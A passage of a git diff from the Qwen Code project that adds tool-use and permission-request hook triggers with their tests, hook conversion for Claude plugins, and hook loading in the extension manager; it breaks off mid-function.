+ it('should send correct parameters to MessageBus', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + await firePermissionRequestHook( + mockMessageBus, + 'run_shell_command', + { command: 'ls' }, + 'auto', + [ + { + type: 'always_allow', + tool: 'run_shell_command', + }, + ], + ); + + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'PermissionRequest', + input: { + tool_name: 'run_shell_command', + tool_input: { command: 'ls' }, + permission_mode: 'auto', + permission_suggestions: [ + { + type: 'always_allow', + tool: 'run_shell_command', + }, + ], + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should handle missing updated_input in allow decision', async () => { + const mockOutput = { + hookSpecificOutput: { + decision: { + behavior: 'allow', + message: 'Tool allowed', + }, + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePermissionRequestHook( + mockMessageBus, + 'test-tool', + {}, + 'auto', + ); + + expect(result).toEqual({ + hasDecision: true, + shouldAllow: true, + denyMessage: undefined, + shouldInterrupt: undefined, + }); + }); + + it('should handle missing message in decision', async () => { + const mockOutput = { + hookSpecificOutput: { + decision: { + behavior: 'deny', + }, + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePermissionRequestHook( + mockMessageBus, + 'test-tool', + {}, + 'auto', + ); + + expect(result).toEqual({ + hasDecision: true, + shouldAllow: false, + denyMessage: undefined, + shouldInterrupt: undefined, + }); + }); + + it('should handle hook 
execution errors gracefully', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockRejectedValue( + new Error('Network error'), + ); + + const result = await firePermissionRequestHook( + mockMessageBus, + 'test-tool', + {}, + 'auto', + ); + + expect(result).toEqual({ hasDecision: false }); + }); + + it('should handle permission_suggestions being undefined', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + await firePermissionRequestHook( + mockMessageBus, + 'run_shell_command', + { command: 'ls' }, + 'auto', + undefined, + ); + + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'PermissionRequest', + input: { + tool_name: 'run_shell_command', + tool_input: { command: 'ls' }, + permission_mode: 'auto', + permission_suggestions: undefined, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should handle different permission modes', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: { hookSpecificOutput: { decision: { behavior: 'allow' } } }, + }); + + const result1 = await firePermissionRequestHook( + mockMessageBus, + 'test-tool', + {}, + 'plan', + ); + + expect(result1.hasDecision).toBe(true); + + const result2 = await firePermissionRequestHook( + mockMessageBus, + 'test-tool', + {}, + 'yolo', + ); + + expect(result2.hasDecision).toBe(true); + }); + }); +}); diff --git a/packages/core/src/core/toolHookTriggers.ts b/packages/core/src/core/toolHookTriggers.ts new file mode 100644 index 000000000..1d62477e0 --- /dev/null +++ b/packages/core/src/core/toolHookTriggers.ts @@ -0,0 +1,478 @@ +/** + * @license + * Copyright 2026 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type { MessageBus } from 
'../confirmation-bus/message-bus.js'; +import { MessageBusType } from '../confirmation-bus/types.js'; +import type { + HookExecutionRequest, + HookExecutionResponse, +} from '../confirmation-bus/types.js'; +import { + createHookOutput, + type PreToolUseHookOutput, + type PostToolUseHookOutput, + type PostToolUseFailureHookOutput, + type NotificationType, + type PermissionRequestHookOutput, + type PermissionSuggestion, +} from '../hooks/types.js'; +import { createDebugLogger } from '../utils/debugLogger.js'; +import type { Part, PartListUnion } from '@google/genai'; + +const debugLogger = createDebugLogger('TOOL_HOOKS'); + +/** + * Generate a tool_use_id for tracking tool executions, formatted as toolu_{Date.now()}_{up to 9 random base-36 characters}; uniqueness is probabilistic, not guaranteed + */ +export function generateToolUseId(): string { + return `toolu_${Date.now()}_${Math.random().toString(36).substring(2, 11)}`; +} + +/** + * Result of PreToolUse hook execution + */ +export interface PreToolUseHookResult { + /** Whether the tool execution should proceed */ + shouldProceed: boolean; + /** If blocked, the reason for blocking */ + blockReason?: string; + /** If blocked, the kind of block: 'denied', 'ask', or 'stop' */ + blockType?: 'denied' | 'ask' | 'stop'; + /** Additional context to add */ + additionalContext?: string; +} + +/** + * Result of PostToolUse hook execution + */ +export interface PostToolUseHookResult { + /** Whether execution should stop */ + shouldStop: boolean; + /** Stop reason if applicable */ + stopReason?: string; + /** Additional context to append to tool response */ + additionalContext?: string; +} + +/** + * Result of PostToolUseFailure hook execution + */ +export interface PostToolUseFailureHookResult { + /** Additional context about the failure */ + additionalContext?: string; +} + +/** + * Fire PreToolUse hook via MessageBus and process the result + * + * @param messageBus - The message bus instance + * @param toolName - Name of the tool being executed + * @param toolInput - Input parameters for the tool + * @param toolUseId - Unique identifier for this tool use + * 
@param permissionMode - Current permission mode + * @returns PreToolUseHookResult indicating whether to proceed, the block reason and type when blocked, and any additional context + */ +export async function firePreToolUseHook( + messageBus: MessageBus | undefined, + toolName: string, + toolInput: Record, + toolUseId: string, + permissionMode: string, +): Promise { + if (!messageBus) { + return { shouldProceed: true }; + } + + try { + const response = await messageBus.request< + HookExecutionRequest, + HookExecutionResponse + >( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'PreToolUse', + input: { + permission_mode: permissionMode, + tool_name: toolName, + tool_input: toolInput, + tool_use_id: toolUseId, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + + if (!response.success || !response.output) { + return { shouldProceed: true }; + } + + const preToolOutput = createHookOutput( + 'PreToolUse', + response.output, + ) as PreToolUseHookOutput; + + // Check if execution was denied + if (preToolOutput.isDenied()) { + return { + shouldProceed: false, + blockReason: + preToolOutput.getPermissionDecisionReason() || + preToolOutput.getEffectiveReason(), + blockType: 'denied', + }; + } + + // Check if user confirmation is required + if (preToolOutput.isAsk()) { + return { + shouldProceed: false, + blockReason: + preToolOutput.getPermissionDecisionReason() || + 'User confirmation required', + blockType: 'ask', + }; + } + + // Check if execution should stop + if (preToolOutput.shouldStopExecution()) { + return { + shouldProceed: false, + blockReason: preToolOutput.getEffectiveReason(), + blockType: 'stop', + }; + } + + // Get additional context + const additionalContext = preToolOutput.getAdditionalContext(); + + return { + shouldProceed: true, + additionalContext, + }; + } catch (error) { + // Hook errors should not block tool execution + debugLogger.warn( + `PreToolUse hook error for ${toolName}: ${error instanceof Error ? 
error.message : String(error)}`, + ); + return { shouldProceed: true }; + } +} + +/** + * Fire PostToolUse hook via MessageBus and process the result + * + * @param messageBus - The message bus instance + * @param toolName - Name of the tool that was executed + * @param toolInput - Input parameters that were used + * @param toolResponse - Response from the tool execution + * @param toolUseId - Unique identifier for this tool use + * @param permissionMode - Current permission mode + * @returns PostToolUseHookResult indicating whether execution should stop (with the stop reason) and any additional context + */ +export async function firePostToolUseHook( + messageBus: MessageBus | undefined, + toolName: string, + toolInput: Record, + toolResponse: Record, + toolUseId: string, + permissionMode: string, +): Promise { + if (!messageBus) { + return { shouldStop: false }; + } + + try { + const response = await messageBus.request< + HookExecutionRequest, + HookExecutionResponse + >( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'PostToolUse', + input: { + permission_mode: permissionMode, + tool_name: toolName, + tool_input: toolInput, + tool_response: toolResponse, + tool_use_id: toolUseId, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + + if (!response.success || !response.output) { + return { shouldStop: false }; + } + + const postToolOutput = createHookOutput( + 'PostToolUse', + response.output, + ) as PostToolUseHookOutput; + + // Check if execution should stop + if (postToolOutput.shouldStopExecution()) { + return { + shouldStop: true, + stopReason: postToolOutput.getEffectiveReason(), + }; + } + + // Get additional context + const additionalContext = postToolOutput.getAdditionalContext(); + + return { + shouldStop: false, + additionalContext, + }; + } catch (error) { + // Hook errors should not affect tool result + debugLogger.warn( + `PostToolUse hook error for ${toolName}: ${error instanceof Error ? 
error.message : String(error)}`, + ); + return { shouldStop: false }; + } +} + +/** + * Fire PostToolUseFailure hook via MessageBus and process the result + * + * @param messageBus - The message bus instance + * @param toolUseId - Unique identifier for this tool use + * @param toolName - Name of the tool that failed + * @param toolInput - Input parameters that were used + * @param errorMessage - Error message describing the failure + * @param isInterrupt - Whether the failure was caused by user interruption + * @param permissionMode - Optional permission mode, forwarded to the hook as permission_mode + * @returns PostToolUseFailureHookResult with any additional context + */ +export async function firePostToolUseFailureHook( + messageBus: MessageBus | undefined, + toolUseId: string, + toolName: string, + toolInput: Record, + errorMessage: string, + isInterrupt?: boolean, + permissionMode?: string, +): Promise { + if (!messageBus) { + return {}; + } + + try { + const response = await messageBus.request< + HookExecutionRequest, + HookExecutionResponse + >( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'PostToolUseFailure', + input: { + permission_mode: permissionMode, + tool_use_id: toolUseId, + tool_name: toolName, + tool_input: toolInput, + error: errorMessage, + is_interrupt: isInterrupt, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + + if (!response.success || !response.output) { + return {}; + } + + const failureOutput = createHookOutput( + 'PostToolUseFailure', + response.output, + ) as PostToolUseFailureHookOutput; + const additionalContext = failureOutput.getAdditionalContext(); + + return { + additionalContext, + }; + } catch (error) { + // Hook errors should not affect error handling + debugLogger.warn( + `PostToolUseFailure hook error for ${toolName}: ${error instanceof Error ? 
error.message : String(error)}`, + ); + return {}; + } +} + +/** + * Result of Notification hook execution + */ +export interface NotificationHookResult { + /** Additional context from the hook */ + additionalContext?: string; +} + +/** + * Fire Notification hook via MessageBus + * Called when Qwen Code sends a notification; resolves to {} when there is no message bus, no successful hook output, or the request throws + */ +export async function fireNotificationHook( + messageBus: MessageBus | undefined, + message: string, + notificationType: NotificationType, + title?: string, +): Promise { + if (!messageBus) { + return {}; + } + + try { + const response = await messageBus.request< + HookExecutionRequest, + HookExecutionResponse + >( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'Notification', + input: { + message, + notification_type: notificationType, + title, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + + if (!response.success || !response.output) { + return {}; + } + + const notificationOutput = createHookOutput( + 'Notification', + response.output, + ); + const additionalContext = notificationOutput.getAdditionalContext(); + + return { + additionalContext, + }; + } catch (error) { + // Notification hook errors should not affect the notification flow + debugLogger.warn( + `Notification hook error: ${error instanceof Error ? error.message : String(error)}`, + ); + return {}; + } +} + +/** + * Result of PermissionRequest hook execution + */ +export interface PermissionRequestHookResult { + /** Whether the hook made a permission decision */ + hasDecision: boolean; + /** If true, the tool execution should proceed */ + shouldAllow?: boolean; + /** Updated tool input to use if allowed */ + updatedInput?: Record; + /** Deny message to pass back to the AI if denied */ + denyMessage?: string; + /** Whether to interrupt the AI after denial */ + shouldInterrupt?: boolean; +} + +/** + * Fire PermissionRequest hook via MessageBus + * Called when a permission dialog is about to be shown to the user. 
+ * Returns a decision that can short-circuit the normal permission flow; hasDecision is false when there is no message bus, no successful hook output, no decision in the output, or the request throws. + */ +export async function firePermissionRequestHook( + messageBus: MessageBus | undefined, + toolName: string, + toolInput: Record, + permissionMode: string, + permissionSuggestions?: PermissionSuggestion[], +): Promise { + if (!messageBus) { + return { hasDecision: false }; + } + + try { + const response = await messageBus.request< + HookExecutionRequest, + HookExecutionResponse + >( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'PermissionRequest', + input: { + tool_name: toolName, + tool_input: toolInput, + permission_mode: permissionMode, + permission_suggestions: permissionSuggestions, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + + if (!response.success || !response.output) { + return { hasDecision: false }; + } + + const permissionOutput = createHookOutput( + 'PermissionRequest', + response.output, + ) as PermissionRequestHookOutput; + + const decision = permissionOutput.getPermissionDecision(); + if (!decision) { + return { hasDecision: false }; + } + + if (decision.behavior === 'allow') { + return { + hasDecision: true, + shouldAllow: true, + updatedInput: decision.updatedInput, + }; + } + + return { + hasDecision: true, + shouldAllow: false, + denyMessage: decision.message, + shouldInterrupt: decision.interrupt, + }; + } catch (error) { + debugLogger.warn( + `PermissionRequest hook error: ${error instanceof Error ? 
error.message : String(error)}`, + ); + return { hasDecision: false }; + } +} + +/** + * Append additional context to tool response content + * + * @param content - Original content (string or PartListUnion) + * @param additionalContext - Context to append; when undefined or empty, content is returned unchanged + * @returns String content joined to the context by a blank line, or array content with an extra text part; non-array Part content is returned unchanged + */ +export function appendAdditionalContext( + content: string | PartListUnion, + additionalContext: string | undefined, +): string | PartListUnion { + if (!additionalContext) { + return content; + } + + if (typeof content === 'string') { + return content + '\n\n' + additionalContext; + } + + // For PartListUnion content, append as an additional text part + if (Array.isArray(content)) { + return [...content, { text: additionalContext } as Part]; + } + + // For non-array content that's still PartListUnion, return as-is (additionalContext is not appended) + return content; +} diff --git a/packages/core/src/core/turn.ts b/packages/core/src/core/turn.ts index 08f379d68..d5675414e 100644 --- a/packages/core/src/core/turn.ts +++ b/packages/core/src/core/turn.ts @@ -43,10 +43,6 @@ export interface ServerTool { params: Record, signal?: AbortSignal, ): Promise; - shouldConfirmExecute( - params: Record, - abortSignal: AbortSignal, - ): Promise; } export enum GeminiEventType { @@ -109,7 +105,6 @@ export interface ToolCallResponseInfo { resultDisplay: ToolResultDisplay | undefined; error: Error | undefined; errorType: ToolErrorType | undefined; - outputFile?: string | undefined; contentLength?: number; } diff --git a/packages/core/src/extension/claude-converter.test.ts b/packages/core/src/extension/claude-converter.test.ts index 502e8196e..c984b17bc 100644 --- a/packages/core/src/extension/claude-converter.test.ts +++ b/packages/core/src/extension/claude-converter.test.ts @@ -17,6 +17,7 @@ import { type ClaudeMarketplacePluginConfig, type ClaudeMarketplaceConfig, } from './claude-converter.js'; +import { HookType } from '../hooks/types.js'; describe('convertClaudeToQwenConfig', () => { it('should convert 
basic Claude config', () => { @@ -433,4 +434,140 @@ describe('convertClaudePluginPackage', () => { // Clean up fs.rmSync(result.convertedDir, { recursive: true, force: true }); }); + + it('should convert hooks from Claude plugin format to Qwen format with variable substitution', async () => { + // Setup: Create a plugin with hooks in Claude format + const pluginSourceDir = path.join(testDir, 'plugin-with-hooks'); + fs.mkdirSync(pluginSourceDir, { recursive: true }); + + // Create hooks directory with hooks.json in Claude format + const hooksDir = path.join(pluginSourceDir, 'hooks'); + fs.mkdirSync(hooksDir, { recursive: true }); + + const hooksJson = { + hooks: { + PostToolUse: [ + { + matcher: 'post-install-matcher', // Part of HookDefinition + sequential: true, // Part of HookDefinition + description: 'Run after installation', + hooks: [ + // HookConfig[] array inside HookDefinition + { + type: HookType.Command, + command: '${CLAUDE_PLUGIN_ROOT}/scripts/post-install.sh', + }, + ], + }, + ], + }, + }; + + fs.writeFileSync( + path.join(hooksDir, 'hooks.json'), + JSON.stringify(hooksJson), + 'utf-8', + ); + + // Create marketplace.json + const marketplaceDir = path.join(pluginSourceDir, '.claude-plugin'); + fs.mkdirSync(marketplaceDir, { recursive: true }); + + const marketplaceConfig: ClaudeMarketplaceConfig = { + name: 'test-marketplace', + owner: { name: 'Test Owner', email: 'test@example.com' }, + plugins: [ + { + name: 'hooks-plugin', + version: '1.0.0', + source: './', + strict: false, + hooks: './hooks/hooks.json', // Reference hooks from file + }, + ], + }; + + fs.writeFileSync( + path.join(marketplaceDir, 'marketplace.json'), + JSON.stringify(marketplaceConfig, null, 2), + 'utf-8', + ); + + // Execute: Convert the plugin + const result = await convertClaudePluginPackage( + pluginSourceDir, + 'hooks-plugin', + ); + + // Verify: The converted config should contain processed hooks + expect(result.config.hooks).toBeDefined(); + 
expect(result.config.hooks!['PostToolUse']).toHaveLength(1); + // Check that the variable was substituted + expect(result.config.hooks!['PostToolUse']![0].hooks![0].command).toBe( + `${pluginSourceDir}/scripts/post-install.sh`, + ); + + // Clean up converted directory + fs.rmSync(result.convertedDir, { recursive: true, force: true }); + }); + + it('should handle hooks defined directly in marketplace config', async () => { + // Setup: Create a plugin with hooks defined directly in marketplace config + const pluginSourceDir = path.join(testDir, 'direct-hooks-plugin'); + fs.mkdirSync(pluginSourceDir, { recursive: true }); + + // Create marketplace.json with hooks defined directly + const marketplaceDir = path.join(pluginSourceDir, '.claude-plugin'); + fs.mkdirSync(marketplaceDir, { recursive: true }); + + const marketplaceConfig: ClaudeMarketplaceConfig = { + name: 'test-marketplace', + owner: { name: 'Test Owner', email: 'test@example.com' }, + plugins: [ + { + name: 'direct-hooks-plugin', + version: '1.0.0', + source: './', + strict: false, + hooks: { + PreToolUse: [ + { + matcher: '*', // Part of HookDefinition + sequential: true, // Part of HookDefinition + hooks: [ + // HookConfig[] array inside HookDefinition + { + type: HookType.Command, + command: 'npm install', + }, + ], + }, + ], + }, + }, + ], + }; + + fs.writeFileSync( + path.join(marketplaceDir, 'marketplace.json'), + JSON.stringify(marketplaceConfig, null, 2), + 'utf-8', + ); + + // Execute: Convert the plugin + const result = await convertClaudePluginPackage( + pluginSourceDir, + 'direct-hooks-plugin', + ); + + // Verify: The converted config should contain the hooks + expect(result.config.hooks).toBeDefined(); + expect(result.config.hooks!['PreToolUse']).toHaveLength(1); + expect(result.config.hooks!['PreToolUse']![0].hooks![0].command).toBe( + 'npm install', + ); + + // Clean up converted directory + fs.rmSync(result.convertedDir, { recursive: true, force: true }); + }); }); diff --git 
a/packages/core/src/extension/claude-converter.ts b/packages/core/src/extension/claude-converter.ts index 6c333c9aa..ff5ba72a9 100644 --- a/packages/core/src/extension/claude-converter.ts +++ b/packages/core/src/extension/claude-converter.ts @@ -16,6 +16,7 @@ import type { ExtensionInstallMetadata, MCPServerConfig, } from '../config/config.js'; +import type { HookEventName, HookDefinition } from '../hooks/types.js'; import { cloneFromGit, downloadFromGitHubRelease } from './github.js'; import { createHash } from 'node:crypto'; import { copyDirectory } from './gemini-converter.js'; @@ -25,9 +26,121 @@ import { } from '../utils/yaml-parser.js'; import { createDebugLogger } from '../utils/debugLogger.js'; import { normalizeContent } from '../utils/textUtils.js'; +import { substituteHookVariables } from './variables.js'; const debugLogger = createDebugLogger('CLAUDE_CONVERTER'); +/** + * Perform variable replacement in all markdown and shell script files of the extension. + * This is done during the conversion phase to avoid modifying files during every extension load. + * @param extensionPath - The path to the extension directory + */ +export function performVariableReplacement(extensionPath: string): void { + // Process markdown files + const mdGlobPattern = '**/*.md'; + const mdGlobOptions = { + cwd: extensionPath, + nodir: true, + }; + + try { + const mdFiles = glob.sync(mdGlobPattern, mdGlobOptions); + + for (const file of mdFiles) { + const filePath = path.join(extensionPath, file); + + try { + const content = fs.readFileSync(filePath, 'utf8'); + + // Replace ${CLAUDE_PLUGIN_ROOT} with the actual extension path + const updatedContent = content.replace( + /\$\{CLAUDE_PLUGIN_ROOT\}/g, + extensionPath, + ); + + // Replace Markdown shell syntax ```! ... ``` with system-recognized !{...} syntax + // This regex finds code blocks with ! 
language identifier and captures their content + const updatedMdContent = updatedContent.replace( + /```!(?:\s*\n)?([\s\S]*?)\n*```/g, + '!{$1}', + ); + + // Only write if content was actually changed + if (updatedMdContent !== content) { + fs.writeFileSync(filePath, updatedMdContent, 'utf8'); + debugLogger.debug( + `Updated variables and syntax in file: ${filePath}`, + ); + } + } catch (error) { + debugLogger.warn( + `Failed to process file ${filePath}: ${error instanceof Error ? error.message : String(error)}`, + ); + } + } + } catch (error) { + debugLogger.warn( + `Failed to scan markdown files in extension directory ${extensionPath}: ${error instanceof Error ? error.message : String(error)}`, + ); + } + + // Process shell script files + const scriptGlobPattern = '**/*.sh'; + const scriptGlobOptions = { + cwd: extensionPath, + nodir: true, + }; + + try { + const scriptFiles = glob.sync(scriptGlobPattern, scriptGlobOptions); + + for (const file of scriptFiles) { + const filePath = path.join(extensionPath, file); + + try { + const content = fs.readFileSync(filePath, 'utf8'); + + // Replace references to "role":"assistant" with "type":"assistant" in shell scripts + const updatedScriptContent = content.replace( + /"role":"assistant"/g, + '"type":"assistant"', + ); + + // Replace transcript parsing logic to adapt to actual transcript structure + // Change from .message.content | map(select(.type == "text")) to .message.parts | map(select(has("text"))) + const adaptedScriptContent = updatedScriptContent.replace( + /\.message\.content\s*\|\s*map\(select\(\.type\s*==\s*"text"\)\)/g, + '.message.parts | map(select(has("text")))', + ); + + // Replace references to ".claude" directory with ".qwen" in shell scripts + // Only match path references (e.g., ~/.claude/, $HOME/.claude, ./.claude/) + // Avoid matching URLs, comments, or string literals containing .claude + const finalScriptContent = adaptedScriptContent.replace( + /(\$\{?HOME\}?\/|~\/)?\.claude(\/|$)/g, + 
'$1.qwen$2', + ); + + // Only write if content was actually changed + if (finalScriptContent !== content) { + fs.writeFileSync(filePath, finalScriptContent, 'utf8'); + debugLogger.debug( + `Updated transcript format and replaced .claude with .qwen in shell script: ${filePath}`, + ); + } + } catch (error) { + debugLogger.warn( + `Failed to process shell script file ${filePath}: ${error instanceof Error ? error.message : String(error)}`, + ); + } + } + } catch (error) { + debugLogger.warn( + `Failed to scan shell script files in extension directory ${extensionPath}: ${error instanceof Error ? error.message : String(error)}`, + ); + } +} + export interface ClaudePluginConfig { name: string; version: string; @@ -40,7 +153,7 @@ export interface ClaudePluginConfig { commands?: string | string[]; agents?: string | string[]; skills?: string | string[]; - hooks?: string; + hooks?: string | { [K in HookEventName]?: HookDefinition[] }; mcpServers?: string | Record; outputStyles?: string | string[]; lspServers?: string | Record; @@ -312,12 +425,21 @@ export function convertClaudeToQwenConfig( } } - // Warn about unsupported fields + // Parse hooks + let hooks: { [K in HookEventName]?: HookDefinition[] } | undefined; if (claudeConfig.hooks) { - debugLogger.warn( - `[Claude Converter] Hooks are not yet supported in ${claudeConfig.name}`, - ); + if (typeof claudeConfig.hooks === 'string') { + // If it's a string, it's a file path, we handle it later in the conversion process + // hooks will be loaded from file path in the convertClaudePluginPackage function + } else { + // Assume it's already in the correct format + hooks = claudeConfig.hooks as { [K in HookEventName]?: HookDefinition[] }; + } + } else { + hooks = undefined; } + + // Warn about unsupported fields if (claudeConfig.outputStyles) { debugLogger.warn( `[Claude Converter] Output styles are not yet supported in ${claudeConfig.name}`, @@ -329,6 +451,7 @@ export function convertClaudeToQwenConfig( version: 
claudeConfig.version, mcpServers, lspServers: claudeConfig.lspServers, + hooks, // Assign the properly typed hooks variable }; } @@ -461,10 +584,49 @@ export async function convertClaudePluginPackage( // Otherwise, keep the existing folder from pluginSource (default behavior) } + // Step 7: Handle hooks from file paths if needed + if (mergedConfig.hooks && typeof mergedConfig.hooks === 'string') { + const hooksPath = path.isAbsolute(mergedConfig.hooks) + ? mergedConfig.hooks + : path.join(pluginSource, mergedConfig.hooks); + + if (fs.existsSync(hooksPath)) { + try { + const hooksContent = fs.readFileSync(hooksPath, 'utf-8'); + const parsedHooks = JSON.parse(hooksContent); + + // Check if the file has a top-level "hooks" property (like Claude plugins use) + // or if the entire file content is the hooks object + let hooksData; + if (parsedHooks.hooks && typeof parsedHooks.hooks === 'object') { + hooksData = parsedHooks.hooks as { + [K in HookEventName]?: HookDefinition[]; + }; + } else { + // Assume the entire file content is the hooks object + hooksData = parsedHooks as { + [K in HookEventName]?: HookDefinition[]; + }; + } + + // Process the hooks to substitute variables like ${CLAUDE_PLUGIN_ROOT} + mergedConfig.hooks = substituteHookVariables(hooksData, pluginSource); + } catch (error) { + debugLogger.warn( + `Failed to parse hooks file ${hooksPath}: ${error instanceof Error ? 
error.message : String(error)}`, + ); + } + } + } + // Step 9.1: Convert collected agent files from Claude format to Qwen format const agentsDestDir = path.join(tmpDir, 'agents'); await convertAgentFiles(agentsDestDir); + // Step 9.2: Perform variable replacement in markdown and shell script files + // This is done during conversion to avoid modifying files during every extension load + performVariableReplacement(tmpDir); + // Step 10: Convert to Qwen format config const qwenConfig = convertClaudeToQwenConfig(mergedConfig); diff --git a/packages/core/src/extension/extensionManager.test.ts b/packages/core/src/extension/extensionManager.test.ts index be94f9056..8ef27da30 100644 --- a/packages/core/src/extension/extensionManager.test.ts +++ b/packages/core/src/extension/extensionManager.test.ts @@ -757,4 +757,139 @@ describe('extension tests', () => { }); }); }); + + describe('hooks loading and processing', () => { + it('should load hooks from qwen-extension.json', async () => { + const extensionDir = path.join(userExtensionsDir, 'hooks-extension'); + fs.mkdirSync(extensionDir, { recursive: true }); + + // Create qwen-extension.json with hooks + const configWithHooks = { + name: 'hooks-extension', + version: '1.0.0', + hooks: { + PreToolUse: [ + { + description: 'Run before tool start', + hooks: [ + { + type: 'command', + command: 'echo "hello"', + }, + ], + }, + ], + }, + }; + + fs.writeFileSync( + path.join(extensionDir, EXTENSIONS_CONFIG_FILENAME), + JSON.stringify(configWithHooks), + ); + + const manager = createExtensionManager(); + await manager.refreshCache(); + const extensions = manager.getLoadedExtensions(); + + expect(extensions).toHaveLength(1); + expect(extensions[0].hooks).toBeDefined(); + expect(extensions[0].hooks!['PreToolUse']).toHaveLength(1); + expect(extensions[0].hooks!['PreToolUse']![0].hooks![0].command).toBe( + 'echo "hello"', + ); + }); + + it('should load hooks from hooks/hooks.json when not in main config', async () => { + const 
extensionDir = path.join( + userExtensionsDir, + 'hooks-from-file-extension', + ); + fs.mkdirSync(extensionDir, { recursive: true }); + + // Create qwen-extension.json without hooks + const configWithoutHooks = { + name: 'hooks-from-file-extension', + version: '1.0.0', + }; + + fs.writeFileSync( + path.join(extensionDir, EXTENSIONS_CONFIG_FILENAME), + JSON.stringify(configWithoutHooks), + ); + + // Create hooks directory and hooks.json + const hooksDir = path.join(extensionDir, 'hooks'); + fs.mkdirSync(hooksDir, { recursive: true }); + + const hooksJson = { + PostToolUse: [ + { + description: 'Run after install', + hooks: [ + { + type: 'command', + command: `echo "installed in ${extensionDir}"`, + }, + ], + }, + ], + }; + + fs.writeFileSync( + path.join(hooksDir, 'hooks.json'), + JSON.stringify(hooksJson), + ); + + const manager = createExtensionManager(); + await manager.refreshCache(); + const extensions = manager.getLoadedExtensions(); + + expect(extensions).toHaveLength(1); + expect(extensions[0].hooks).toBeDefined(); + expect(extensions[0].hooks!['PostToolUse']).toHaveLength(1); + expect(extensions[0].hooks!['PostToolUse']![0].hooks![0].command).toBe( + `echo "installed in ${extensionDir}"`, + ); + }); + + it('should substitute ${CLAUDE_PLUGIN_ROOT} variable in hooks', async () => { + const extensionDir = path.join(userExtensionsDir, 'hooks-var-extension'); + fs.mkdirSync(extensionDir, { recursive: true }); + + // Create qwen-extension.json with hooks using ${CLAUDE_PLUGIN_ROOT} + const configWithHooks = { + name: 'hooks-var-extension', + version: '1.0.0', + hooks: { + PreToolUse: [ + { + description: 'Run before start with var', + hooks: [ + { + type: 'command', + command: '${CLAUDE_PLUGIN_ROOT}/scripts/setup.sh', + }, + ], + }, + ], + }, + }; + + fs.writeFileSync( + path.join(extensionDir, EXTENSIONS_CONFIG_FILENAME), + JSON.stringify(configWithHooks), + ); + + const manager = createExtensionManager(); + await manager.refreshCache(); + const extensions = 
manager.getLoadedExtensions(); + + expect(extensions).toHaveLength(1); + expect(extensions[0].hooks).toBeDefined(); + expect(extensions[0].hooks!['PreToolUse']).toHaveLength(1); + expect(extensions[0].hooks!['PreToolUse']![0].hooks![0].command).toBe( + `${extensionDir}/scripts/setup.sh`, + ); + }); + }); }); diff --git a/packages/core/src/extension/extensionManager.ts b/packages/core/src/extension/extensionManager.ts index 3af573ac7..d0382347e 100644 --- a/packages/core/src/extension/extensionManager.ts +++ b/packages/core/src/extension/extensionManager.ts @@ -11,6 +11,7 @@ import type { SubagentConfig, ClaudeMarketplaceConfig, } from '../index.js'; +import type { HookEventName, HookDefinition } from '../hooks/types.js'; import { Storage, Config, @@ -28,6 +29,7 @@ import { EXTENSIONS_CONFIG_FILENAME, INSTALL_METADATA_FILENAME, recursivelyHydrateStrings, + substituteHookVariables, } from './variables.js'; import { resolveEnvVarsInObject } from '../utils/envVarResolver.js'; import { @@ -100,6 +102,7 @@ export interface Extension { commands?: string[]; skills?: SkillConfig[]; agents?: SubagentConfig[]; + hooks?: { [K in HookEventName]?: HookDefinition[] }; } export interface ExtensionConfig { @@ -112,6 +115,7 @@ export interface ExtensionConfig { skills?: string | string[]; agents?: string | string[]; settings?: ExtensionSetting[]; + hooks?: { [K in HookEventName]?: HookDefinition[] }; } export interface ExtensionUpdateInfo { @@ -662,6 +666,50 @@ export class ExtensionManager { `${effectiveExtensionPath}/agents`, ); + if (config.hooks) { + // Process the hooks to substitute variables like ${CLAUDE_PLUGIN_ROOT} + extension.hooks = this.substituteHookVariables( + config.hooks, + effectiveExtensionPath, + ); + } + + // Also load hooks from hooks directory if available and not already set + if (!extension.hooks) { + const hooksDir = path.join(effectiveExtensionPath, 'hooks'); + const hooksJsonPath = path.join(hooksDir, 'hooks.json'); + + if (fs.existsSync(hooksJsonPath)) 
